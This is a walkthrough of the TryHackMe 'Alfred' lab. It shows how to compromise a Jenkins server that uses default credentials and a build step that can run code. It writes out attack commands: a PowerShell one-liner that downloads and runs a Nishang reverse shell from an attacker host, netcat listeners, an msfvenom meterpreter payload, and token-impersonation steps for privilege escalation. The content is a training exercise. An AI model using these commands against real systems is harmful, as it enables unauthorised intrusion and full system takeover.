image

The Alfred room on TryHackMe focuses on exploiting Jenkins. A commonly misconfigured automation tool that developers use for continuous integration/deployment.

Alfred is a subscription only room.

Initial access

This task requires you to deploy the machine and load up Nishang to gain initial access. Nishang is a framework and a collection of scripts and payloads which enable usage of PowerShell for offensive security by nikhil_mitt.

Nmap (TCP)

Start by scanning the machine with nmap. This way, we can see what ports are open.

nmap 10.10.160.207

This will reveal that there are 3 open ports. Ports 80, 3389, 8080.

image 1

Get Credentials

Referring back to the nmap scan, there are 2 http services. Let’s check these out.

Note: there are two services; one on port 80, and another on port 8080.

10.10.160.207:80

image 2

10.10.160.207:8080

image 4

This task requires us to crack the Jenkins login, on port 8080 specifically.

Jenkins default credentials

A simple Google search reveals the default admin username for Jenkins is “admin“.

After toying around with a few admin:password potentials–first trying some Batman-related passwords, i.e. Bruce, Wayne, Joker .etc– I stumbled on the password before loading up some brute force tools.

The password is.. you guessed it.. admin.

The username:password flag is admin:admin.

image 5

Jenkins exploit

No that we’ve gained access to Jenkins, lets look for some remote code execution vulns.

The script first requires us to start a python server that the site can download the script from.

The Powershell script we need to download is available at the top of the page.

Start Python server

python3 -m http.server

image 14

This will make the directory, where the command was run, accessible on 0.0.0.0:8000.

Also accessible on your localhost IP, found via ip addr command.

image 15

So let’s download the PowerShell script (above) and then run the given script. Then, the Jenkins console can download the PowerShell script and run it on the target machine.

image 16

RCE Vulnerability

TryHackMe provides a command for us to run on the host.

powershell iex (New-Object Net.WebClient).DownloadString('http://your-ip:your-port/Invoke-PowerShellTcp.ps1');Invoke-PowerShellTcp -Reverse -IPAddress your-ip -Port your-port

Of course, swap your-ip and your-port.

So, at first, I toyed with the Script Console, attempting to exploit some Java scripts to download and run the above PowerShell script.

But, gave up on this after figuring out you can run a shell script in the build options for the project.

image 20
image 17

The script here will run on build.

image 18
image 19

Wait for it to finish.

image 21

Then, we need to run a netcat listener. On the port we gave. Run the following command.

nc -l -p 1337

And rebuild the Jenkins project again.

image 22

And.. we’re in!

From here, we need to find the user.txt flag.

User flag

Using some general knowledge, we should cd .. up through the system.

image 23

And eventually, we see something that clicks. C:\Users\bruce

image 24
image 25

And finally, we find the user.txt file. And the flag.

Meterpreter

Task 2 sees us generating an msfvenom payload. Running the following command.

msfvenom -p windows/meterpreter/reverse_tcp -a x86 – encoder x86/shikata_ga_nai LHOST=[IP] LPORT=[PORT] -f exe -o [SHELL NAME].exe

image 27

I’d tried to download and run the msfvenon payload via the previous shell that we’d gotten, but to no avail.

The flag: is about the size of the msfvenom payload. We can see this by running the ls -la command. It’s 73802 bytes.

image 34

Instead, I found success by running it through the same build options we exploited earlier. But with the new payload.

powershell "(New-Object System.Net.WebClient).Downloadfile('http://10.11.8.219:8000/theJoker.exe','theJoker.exe')"

Before going through the build process, we need to launch the Metasploit “listener”. By running msfconsole, then using the the exploit/multi/handler, with the payload we using the previous msfcommand, windows/meterpreter/reverse_tcp.

image 28
image 29
image 30
image 31

Now we’re listening, we can run the build on Jenkins.

image 32

After rebuilding, we see the meterpreter session opens successfully.

image 33

Privilege Escalation

Ugh, this was a bit of a nightmare.

So, flip the build options BACK to the original netcat route we took. Start a listener nc -l -p 1234.

Once you get shell, then, run the given powershell command from TryHackMe.

image 36

powershell "(New-Object System.Net.WebClient).Downloadfile('http://<ip>:8000/shell-name.exe','shell-name.exe')"

Make sure not to cd out of the folder.

image 35

Just Start-Process "theJoker.exe" to run the msfvenom payload.

Make sure you’re running the msfconsole exploit exploit/multi/handler for shell.

image 37

From here, we can execute the command shell for shell.

Then we can see all privileges with whoami /priv

image 38

To escape the shell, just hit Ctrl+C.

Then, we can load the incognito module to exploit two of the enabled privileges, using load incognito.

image 39

Lets see what tokens are available with list_tokens -g.

From here, we see that the BUILTIN\Administrators tokens are available and can be impersonated.

image 40

After running the command impersonate_token BUILTIN\\ADMINISTRATORS we get the required output. Note, the double backslash escapes the backslash.

image 41

The above confirms we’re impersonating NT AUTHORITY\SYSTEM.

However, despite us impersonating someone with authority. Our process might not have authority. So let’s grab the PID of the services.exe process and then migrate to that process.

Fire off the command ps | grep services.exe

image 42

Then take the PID number–probably different for you–then run the migrate command to “move to” that process owned by the user we’re impersonating.

image 43

Now we’ve escalated privilege, to get the root flag, we need to cd C:\Windows\System32\config , then cat root.txt.

Leave a Reply